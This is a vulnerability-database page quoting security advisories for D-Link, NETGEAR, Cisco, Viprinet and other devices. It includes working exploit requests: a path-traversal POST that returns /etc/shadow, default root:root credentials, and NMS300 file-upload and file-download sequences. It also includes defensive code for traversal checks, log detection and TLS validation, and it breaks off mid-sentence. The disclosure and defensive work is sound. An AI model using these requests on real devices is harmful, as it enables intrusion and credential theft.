VARIoT IoT vulnerabilities database


VAR-201602-0469 No CVE (0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
VAR-201602-0474 No CVE (0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll NodeName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
VAR-201602-0473 No CVE (0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x13C7D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
VAR-201704-0220 CVE-2015-7247 D-Link DVG-N5402SP firmware information disclosure via configuration backup CVSS V2: 7.8
CVSS V3: 9.8
Severity: CRITICAL
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information. The D-Link DVG-N5402SP is a wireless router from D-Link for voice, fax and shared wireless Internet access over IP networks. The vulnerability stems from the device storing configuration data, including credentials, in clear text; anyone who can obtain a configuration backup can recover them. D-Link DVG-N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') to obtain sensitive information, and possibly mount other attacks.

The original advisory (Karn Ganeshen), covering CVE-2015-7245, CVE-2015-7246 and CVE-2015-7247, follows.

DLink DVG-N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

*Timelines*
Reported to CERT + Vendor: August 2015
Dlink released beta release: Oct 23, 2015
New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb
No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out

*Vulnerable Models, Firmware, Hardware versions*
DVG-N5402SP Web Management
Model Name : GPN2.4P21-C-CN
Firmware Version : W1000CN-00
Firmware Version : W1000CN-03
Firmware Version : W2000EN-00
Hardware Platform : ZS
Hardware Version : Gpn2.4P21-C_WIFI-V0.05

Device can be managed through three users:
1. super - full privileges
2. admin - full privileges
3. support - restricted user

*1. Path traversal*
Arbitrary files can be read off of the device file system.
*CVE-ID*: CVE-2015-7245

*HTTP Request*
POST /cgi-bin/webproc HTTP/1.1
Host: <IP>:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<IP>:8080/cgi-bin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj-action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

*HTTP Response*
HTTP/1.0 200 OK
pstVal->name:getpage; pstVal->value:html/main.html
pstVal->name:getpage; pstVal->value:html/index.html
pstVal->name:errorpage; pstVal->value:../../../../../../../../../../../etc/shadow
pstVal->name:var:menu; pstVal->value:setup
pstVal->name:var:page; pstVal->value:connected
pstVal->name:var:subpage; pstVal->value:-
pstVal->name:obj-action; pstVal->value:auth
pstVal->name::username; pstVal->value:super
pstVal->name::password; pstVal->value:super
pstVal->name::action; pstVal->value:login
pstVal->name::sessionid; pstVal->value:1ac5da6b
Connection: close
Content-type: text/html
Pragma: no-cache
Cache-Control: no-cache
set-cookie: sessionid=1ac5da6b; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::

*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords (root:root, tw:tw). Login - tw - is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, loss of confidentiality, or loss of availability.

*3. Sensitive info leakage via device running configuration backup*
*CVE-ID*: CVE-2015-7247
Usernames, passwords, keys, values and web account hashes (super & admin) are stored in clear-text and not masked. It is noted that the restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device.

--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
VAR-201704-0219 CVE-2015-7246 D-Link DVG-N5402SP firmware default system credentials allow administrative access CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 has a default password of root for the root account and tw for the tw account, which makes it easier for remote attackers to obtain administrative access. The D-Link DVG-N5402SP is a wireless router from D-Link for voice, fax and shared wireless Internet access over IP networks. The vulnerability stems from hard-coded default credentials on the system accounts; an attacker who can reach the Telnet service (when enabled) can log in with them and gain administrative control. D-Link DVG-N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') to obtain sensitive information, and possibly mount other attacks. The full advisory by Karn Ganeshen (CVE-2015-7245, CVE-2015-7246, CVE-2015-7247) is quoted under VAR-201704-0220 above; the section for this issue reads:

*2. Use of Default, Hard-Coded Credentials*
*CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords (root:root, tw:tw). Login - tw - is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled), leading to loss of integrity, loss of confidentiality, or loss of availability.
VAR-201704-0218 CVE-2015-7245 D-Link DVG-N5402SP Directory traversal vulnerability in some firmware CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. The D-Link DVG-N5402SP is a wireless router from D-Link for voice, fax and shared wireless Internet access over IP networks. An attacker could exploit this vulnerability to read arbitrary files from the device file system. D-Link DVG-N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') to obtain sensitive information, and possibly mount other attacks. The full advisory by Karn Ganeshen (CVE-2015-7245, CVE-2015-7246, CVE-2015-7247), including the complete HTTP request and response, is quoted under VAR-201704-0220 above; the section for this issue reads:

*1. Path traversal*
Arbitrary files can be read off of the device file system.
*CVE-ID*: CVE-2015-7245

The traversal is carried in the errorpage parameter of a POST to /cgi-bin/webproc (errorpage=../../../../../../../../../../../etc/shadow); the response echoes the parameter back and appends the contents of /etc/shadow.
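The request quoted above passes the errorpage value to the file system unchanged. What follows is an added example, not D-Link firmware code and not part of the advisory, of how a CGI handler can confine a requested page to its web root in Python. The web root /usr/www and the function names are assumptions, and the check goes further than the page's own request by also decoding percent-encoded and double-encoded traversal sequences. The same check applies to the realName parameter of the NETGEAR NMS300 entry further down this page.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/usr/www"  # assumed document root for the CGI's html/ pages


class TraversalError(ValueError):
    """Raised when a requested page would resolve outside the web root."""


def resolve_page(requested: str, web_root: str = WEB_ROOT) -> str:
    """Return the absolute path of a requested page confined to web_root.

    Steps: percent-decode until the value stops changing (catches %2e%2e%2f
    and double-encoded %252e%252e%252f), reject NUL bytes, backslashes and
    absolute paths, normalise '.' and '..' lexically, then confirm the result
    still lies under web_root.
    """
    decoded = requested
    for _ in range(3):  # bounded: stop once decoding no longer changes anything
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded or "\\" in decoded or decoded.startswith("/"):
        raise TraversalError(f"rejected page reference: {requested!r}")
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # normpath clamps excess '..' at '/', so an escaped path simply fails the prefix test
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError(f"path escapes web root: {requested!r}")
    return candidate


def is_safe(requested: str) -> bool:
    """Convenience wrapper for filters that only need a yes/no answer."""
    try:
        resolve_page(requested)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # The payload from the advisory's request, beside a legitimate page reference.
    for page in ("html/index.html", "../../../../../../../../../../../etc/shadow"):
        print(page, "->", "allowed" if is_safe(page) else "rejected")
```

Lexical normalisation is enough to reject the payloads on this page, but on a live file system it says nothing about symbolic links: resolve the candidate with os.path.realpath and repeat the prefix check before opening it.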
VAR-201602-0440 No CVE Huawei P8 and Mate S Local Security Bypass Vulnerability CVSS V2: 2.1
CVSS V3: -
Severity: LOW
Both the Huawei P8 and Mate S are smartphone products from China's Huawei. A local security bypass vulnerability exists in Huawei P8 and Mate S. A local attacker could use this vulnerability to bypass security restrictions.
VAR-201604-0456 CVE-2016-1495 Huawei Mate S Integer overflow vulnerability in smartphone software graphics driver CVSS V2: 9.3
CVSS V3: 7.8
Severity: HIGH
Integer overflow in the graphics drivers in Huawei Mate S smartphones with software CRR-TL00 before CRR-TL00C01B160SP01, CRR-UL00 before CRR-UL00C00B160, and CRR-CL00 before CRR-CL00C92B161 allows attackers to cause a denial of service (system crash) or gain privileges via a crafted application, which triggers a heap-based buffer overflow. Huawei Mate S is a smartphone product from China's Huawei. Huawei Mate S is prone to a local integer-overflow vulnerability. Failed exploit attempts will likely cause denial-of-service conditions. The following versions are affected: Huawei Mate S using CRR-TL00C01B153SP01 and earlier, CRR-UL00C00B153 and earlier, and CRR-CL00C92B153 and earlier versions of the software.
VAR-201602-0220 CVE-2015-6398 Cisco Nexus 9000 Application Centric Infrastructure Mode Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Cisco Nexus 9000 Application Centric Infrastructure (ACI) Mode switches with software before 11.0(1c) allow remote attackers to cause a denial of service (device reload) via an IPv4 ICMP packet with the IP Record Route option, aka Bug ID CSCuq57512. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuq57512
VAR-201602-0044 CVE-2016-1301 Cisco ASA CX Content-Aware Security and Prime Security Manager Software arbitrary password change vulnerability CVSS V2: 8.5
CVSS V3: 8.8
Severity: HIGH
The RBAC implementation in Cisco ASA-CX Content-Aware Security software before 9.3.1.1(112) and Cisco Prime Security Manager (PRSM) software before 9.3.1.1(112) allows remote authenticated users to change arbitrary passwords via a crafted HTTP request, aka Bug ID CSCuo94842. The vendor tracks this vulnerability as Bug ID CSCuo94842. Supplementary information: the vulnerability type has been identified as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). A remotely authenticated user may change any password via a crafted HTTP request. An attacker can exploit this issue to gain elevated privileges on an affected application. PRSM is a multi-device management platform for ASA CX: multiple ASA CX devices can be added to PRSM's device inventory and security policies applied to them from there. A remote, authenticated attacker could exploit this vulnerability to change arbitrary passwords by sending specially crafted HTTP requests.
VAR-201602-0045 CVE-2016-1302 Cisco Application Policy Infrastructure Controller and Nexus 9000 ACI Mode switch software RBAC restriction bypass vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
Cisco Application Policy Infrastructure Controller (APIC) devices with software before 1.0(3h) and 1.1 before 1.1(1j) and Nexus 9000 ACI Mode switches with software before 11.0(3h) and 11.1 before 11.1(1j) allow remote authenticated users to bypass intended RBAC restrictions via crafted REST requests, aka Bug ID CSCut12998. The vendor tracks this vulnerability as Bug ID CSCut12998. Supplementary information: the vulnerability type has been identified as CWE-284: Improper Access Control (http://cwe.mitre.org/data/definitions/284.html). A remotely authenticated user may bypass RBAC restrictions via a crafted REST request. Cisco Application Policy Infrastructure Controllers and Cisco Nexus 9000 Series ACI Mode Switches are products of Cisco: the former is the controller that automates management of an Application Centric Infrastructure (ACI) fabric, the latter are the 9000 series switches for ACI. A remote authenticated attacker can bypass the established RBAC restrictions by sending specially crafted REST requests, perform unauthorized actions, and use the result to aid further attacks.
VAR-201602-0049 CVE-2016-1308 Cisco Unified Communications Manager SQL injection vulnerability CVSS V2: 6.5
CVSS V3: 6.5
Severity: MEDIUM
SQL injection vulnerability in Cisco Unified Communications Manager 10.5(2.13900.9) allows remote authenticated users to execute arbitrary SQL commands via a crafted URL, aka Bug ID CSCux99227. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is being tracked by Cisco Bug ID CSCux99227. Cisco Unified Communications Manager provides a scalable, distributed and highly available enterprise IP telephony call-processing solution.
VAR-201602-0051 CVE-2016-1310 Cisco Unity Connection cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in Cisco Unity Connection 11.5(0.199) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCuy09033. Cisco Unity Connection (UC) is a voice messaging platform from Cisco; it lets users place calls or listen to messages "hands-free" by voice command. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuy09033.
VAR-201602-0052 CVE-2016-1311 Cisco Jabber Guest Server Management interface cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the management interface in Cisco Jabber Guest Server 10.6(8) allows remote attackers to inject arbitrary web script or HTML via the host tag parameter, aka Bug ID CSCuy08224. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuy08224.
VAR-201602-0192 CVE-2016-1524 Netgear Management System NMS300 contains arbitrary file upload and path traversal vulnerabilities CVSS V2: 8.3
CVSS V3: 9.6
Severity: HIGH
Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability additionally enables authenticated users to download arbitrary files via a .. (dot dot) in the realName parameter. Supplementary information: the vulnerability type has been identified as CWE-434: Unrestricted Upload of File with Dangerous Type. The NETGEAR Management System NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable.

The original advisory (Pedro Ribeiro) follows.

>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016

>> Background on the affected product:
"NMS300 ProSAFE® Network Management System
Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."

>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has two serious vulnerabilities that can be exploited by a remote attacker.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1].
Two new Metasploit modules that exploit these vulnerabilities have been released.

So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.

POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3

------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"

[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream

<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--

#2 Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13

Three steps need to be taken in order to exploit this vulnerability:

a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla

b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
POST /data/getPage.do?method=getPageList&type=configImgManager
everyPage=10000

Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}

c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=<ID>

>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any untrusted networks.

>> References:
[1] https://www.kb.cert.org/vuls/id/777024

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
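The advisory gives the request sequence but not how to recognise it after the fact. What follows is an added example, not NETGEAR's code and not the advisory author's, of detection logic run over web-server access logs: it flags POSTs to either fileUpload.do endpoint, treats a GET for a null-prefixed .jsp as execution of an uploaded file (critical when the same client uploaded within the window, high otherwise), and notes an image.do add followed by an export from the same client. The log lines are constructed in Tomcat/Apache common format; the field layout, window size and severity labels are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines modelling the sequence the advisory describes.
# They are not real NMS300 logs.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2016:10:01:02 +0000] "GET /index.jsp HTTP/1.1" 200 5120
10.0.0.9 - - [04/Feb/2016:10:03:10 +0000] "POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1" 200 24
10.0.0.9 - - [04/Feb/2016:10:03:12 +0000] "GET /nullshell.jsp HTTP/1.1" 200 311
10.0.0.5 - admin [04/Feb/2016:10:10:00 +0000] "POST /data/config/image.do?method=add HTTP/1.1" 200 17
10.0.0.5 - admin [04/Feb/2016:10:10:01 +0000] "POST /data/getPage.do?method=getPageList&type=configImgManager HTTP/1.1" 200 640
10.0.0.5 - admin [04/Feb/2016:10:10:03 +0000] "GET /data/config/image.do?method=export&imageId=7 HTTP/1.1" 200 24491
10.0.0.7 - - [04/Feb/2016:11:00:00 +0000] "POST /fileUpload.do HTTP/1.1" 200 24
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Both upload endpoints named in the CVE text (no authentication in affected versions).
UPLOAD_RE = re.compile(r"(?:^|/)fileUpload\.do$")
# Uploaded files are stored as "null" + name, so a GET for /null*.jsp is the
# client running the JSP it just uploaded.
NULL_JSP_RE = re.compile(r"^/null[^/]*\.jsp$", re.IGNORECASE)
IMAGE_ADD_RE = re.compile(r"^/data/config/image\.do\?method=add(?:&|$)")
IMAGE_EXPORT_RE = re.compile(r"^/data/config/image\.do\?method=export(?:&|$)")


def parse_line(line):
    """Split one common-format line into fields; None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e


def _within(earlier_times, now, window):
    return any(0 <= (now - t).total_seconds() <= window.total_seconds() for t in earlier_times)


def detect(log_text, window=timedelta(minutes=10)):
    """Return (severity, client_ip, message) findings in log order."""
    findings = []
    uploads = defaultdict(list)  # ip -> times of POSTs to fileUpload.do
    adds = defaultdict(list)     # ip -> times of image.do?method=add
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        path_only = e["path"].split("?", 1)[0]
        if e["method"] == "POST" and UPLOAD_RE.search(path_only):
            uploads[e["ip"]].append(e["ts"])
            findings.append(("medium", e["ip"], f"POST to upload endpoint {path_only}"))
        elif e["method"] == "GET" and NULL_JSP_RE.match(path_only):
            sev = "critical" if _within(uploads[e["ip"]], e["ts"], window) else "high"
            findings.append((sev, e["ip"], f"null-prefixed JSP requested: {path_only}"))
        elif e["method"] == "POST" and IMAGE_ADD_RE.match(e["path"]):
            adds[e["ip"]].append(e["ts"])
        elif (e["method"] == "GET" and IMAGE_EXPORT_RE.match(e["path"])
              and e["status"] == 200 and _within(adds[e["ip"]], e["ts"], window)):
            # realName travels in the POST body, which access logs do not record, so an
            # add-then-export pair is only a prompt to pull the body from a proxy or
            # the application's own image table (the realFileName field above).
            findings.append(("low", e["ip"], "config image added then exported; check realName for '../'"))
    return findings


if __name__ == "__main__":
    for sev, ip, msg in detect(SAMPLE_LOG):
        print(f"{sev:8} {ip:10} {msg}")
```

Because the export step is legitimate administrator activity on its own, the add/export pairing is kept at low severity and only serves to narrow which request bodies to inspect; the null-prefixed JSP request is the indicator worth alerting on.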
VAR-201701-0627 CVE-2014-9754 Viprinet Multichannel VPN Router 300 hardware VPN client man-in-the-middle vulnerability CVSS V2: 4.3
CVSS V3: 5.9
Severity: MEDIUM
The hardware VPN client in Viprinet MultichannelVPN Router 300 version 2013070830/2013080900 does not validate the remote VPN endpoint identity (through the checking of the endpoint's SSL key) before initiating the exchange, which allows an attacker to perform a Man in the Middle attack. Viprinet Europe Multichannel VPN Router 300 is a multi-channel VPN router product from Viprinet Europe, Germany. The vulnerability stems from the VPN client failing to validate the remote endpoint's certificate; an attacker positioned between client and server can perform a man-in-the-middle attack and impersonate the trusted server. Viprinet Multichannel VPN Router 300 is prone to the following security vulnerabilities:
1. Multiple cross-site scripting vulnerabilities
2. An HTML-injection vulnerability
3. Multiple security-bypass vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers, or bypass certain security restrictions and perform unauthorized actions.

From the Portcullis advisory: In this example, we perform a downgrade attack from protocol version 3 to protocol version 2, however as noted in the impact, version 3 of the protocol is similarly affected.
Note: MITRE have assigned CVE-2014-9754 to reference the missing certificate validation and CVE-2014-9755 to reference the protocol downgrade attack.
Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-9754-cve-2014-9755/
Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
VAR-201701-0628 CVE-2014-9755 Viprinet Multichannel VPN Router 300 hardware VPN client replay attack vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
The hardware VPN client in Viprinet MultichannelVPN Router 300 version 2013070830/2013080900 does not validate the remote VPN endpoint identity (through the checking of the endpoint's SSL key) before initiating the exchange, which allows remote attackers to perform a replay attack. Viprinet Europe Multichannel VPN Router 300 is a multi-channel VPN router product from Viprinet Europe, Germany. Because the client does not authenticate the endpoint before the exchange begins, an attacker can replay captured protocol traffic and force a protocol downgrade. Viprinet Multichannel VPN Router 300 is prone to the following security vulnerabilities:
1. Multiple cross-site scripting vulnerabilities
2. An HTML-injection vulnerability
3. Multiple security-bypass vulnerabilities
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers, or bypass certain security restrictions and perform unauthorized actions.

From the Portcullis advisory: In this example, we perform a downgrade attack from protocol version 3 to protocol version 2, however as noted in the impact, version 3 of the protocol is similarly affected.
Note: MITRE have assigned CVE-2014-9754 to reference the missing certificate validation and CVE-2014-9755 to reference the protocol downgrade attack.
Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-9754-cve-2014-9755/
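Both Viprinet entries above come down to the client accepting whatever certificate the remote endpoint presents. What follows is an added example, not Viprinet code, of the client-side check in Python's ssl module: a context that requires a CA-validated certificate and a matching hostname before any application data is exchanged, the insecure context for contrast, and a certificate-fingerprint pin for the "checking of the endpoint's SSL key" the advisory describes. The host, port and pin values are assumptions. The protocol-version downgrade referenced in CVE-2014-9755 happens inside Viprinet's own protocol, for which the page gives no detail, and is not modelled here.

```python
import hashlib
import socket
import ssl


def client_context(ca_file=None):
    """Client TLS context that verifies the remote endpoint's identity: a chain
    to a trusted CA (ca_file, or the platform store when None) and a hostname
    match, both enforced during the handshake, before any application data."""
    ctx = ssl.create_default_context(cafile=ca_file)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def insecure_context():
    """The failure mode in the entries above: any certificate is accepted, so
    whoever answers on the path can impersonate the VPN endpoint."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False   # must be cleared before verify_mode is relaxed
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def validates_identity(ctx):
    """True only if the context both requires a certificate and checks the name."""
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def fingerprint(der_cert):
    """SHA-256 over the DER-encoded certificate, as lowercase hex."""
    return hashlib.sha256(der_cert).hexdigest()


def verify_pin(der_cert, pins):
    """Pinning: the leaf certificate must match one of the operator-provisioned
    fingerprints, on top of CA validation. Case-insensitive on the hex."""
    return fingerprint(der_cert) in {p.lower() for p in pins}


def connect_and_pin(host, port, pins, ca_file=None, timeout=5.0):
    """Handshake with chain and hostname validation, then refuse to proceed if
    the presented leaf certificate is not pinned. Raises before any byte of the
    application protocol is sent. Needs a reachable endpoint (assumed values)."""
    ctx = client_context(ca_file)
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            der = tls.getpeercert(binary_form=True)
            if not verify_pin(der, pins):
                raise ssl.SSLError(
                    f"endpoint certificate {fingerprint(der)} is not in the pin set"
                )
            return tls.version()


if __name__ == "__main__":
    print("strict context validates identity:", validates_identity(client_context()))
    print("insecure context validates identity:", validates_identity(insecure_context()))
```

connect_and_pin needs network access; the other functions run offline. Pinning the whole certificate means the pin set must be rotated whenever the certificate is reissued; pinning the SubjectPublicKeyInfo instead survives reissuance under the same key but needs a certificate parser outside the standard library.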
VAR-201701-0533 CVE-2014-2045 Viprinet Europe Multichannel VPN Router 300 Cross-Site Scripting Vulnerability CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in the old and new interfaces in Viprinet Multichannel VPN Router 300 allow remote attackers to inject arbitrary web script or HTML via the username when (1) logging in or (2) creating an account in the old interface, (3) username when creating an account in the new interface, (4) hostname in the old interface, (5) inspect parameter in the config module, (6) commands parameter in the atcommands tool, or (7) host parameter in the ping tool. Viprinet Europe Multichannel VPN Router 300 is a multi-channel VPN router product from Viprinet Europe, Germany. A cross-site scripting vulnerability exists in Viprinet Europe Multichannel VPN Router 300; an attacker could exploit it to inject arbitrary web script or HTML. The device is also prone to an HTML-injection vulnerability and multiple security-bypass vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers, or bypass certain security restrictions and perform unauthorized actions.

Storing user-supplied data for later display is a normal feature of many applications; however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.

Stored cross-site scripting could be triggered by:
